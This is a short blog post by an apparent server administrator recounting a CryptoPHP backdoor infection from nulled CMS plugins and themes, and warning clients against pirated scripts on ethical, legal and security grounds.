In a recent blog post, I talked about how CryptoPHP, a backdoor malware bundled with nulled CMS plugins and themes, got on my servers and how I wasted an entire weekend cleaning up the mess.
While sending out a notification email to the clients whose servers were infected, I discovered that, way back in November 2014, I sent out an alert to all clients about this very malware. And before the recent CryptoPHP infection, I had spent innumerable hours detecting and cleaning up various rogue PHP code hidden in nulled scripts installed used by some of these clients of mine (or their clients); and after each clean-up I’d send out a strong warning about the ethical, legal and security implications of using nulled scripts.
For those who need a refresher on the terminology, nulled scripts (or nulled code) are commercial web applications that are offered for free download at various pirate websites. These nulled scripts have been modified to remove the protection implemented by the original developer so the script can work anywhere without a license key.
Even though there may be pirate websites out there that provide nulled scripts with no strings attached (so to speak), these “clean” nulled scripts are the exception rather than the norm. In most cases these nulled scripts are more than the original scripts minus their protection: more often than not malware are also hidden inside the scripts. By publishing pirated themes and plug-ins free for anyone to use instead of having to pay for them, the actors behind these nulled scripts are social engineering unethical site administrators into installing the included backdoor on their server.
These backdoors (hidden malware code) are then used by the ne’er-do-wells behind them to command the websites and servers where the backdoors are installed to perform various nefarious and illegal activities such as email spam, unethical (aka blackhat) SEO, or denial of service attacks. Increasingly, massive numbers of these infected websites and servers are drawn together by criminals into massive “botnets” and commanded to undertake large-scale attacks.
If you think about it, why would anyone go through the trouble of acquiring hundreds or even thousands of these commercial scripts, setting up and maintaining a website, and uploading these themes for you to download for free? Are they merely anti-capitalists, or simply altruistic? No, and no. I’d wager that 99% of the time they do so because they hide their own malware in these downloads, so they can use sites that install them for various nefarious deeds.
So if the ethical and legal walls haven’t stopped you from stealing other people’s works (which is how I see using pirated software of any kind) in the past, here is hoping the serious security risks mentioned here will. As for my own clients (and their clients), none of these have stopped them from using nulled scripts, themes and plugins in the past and I’m not holding my breath this time.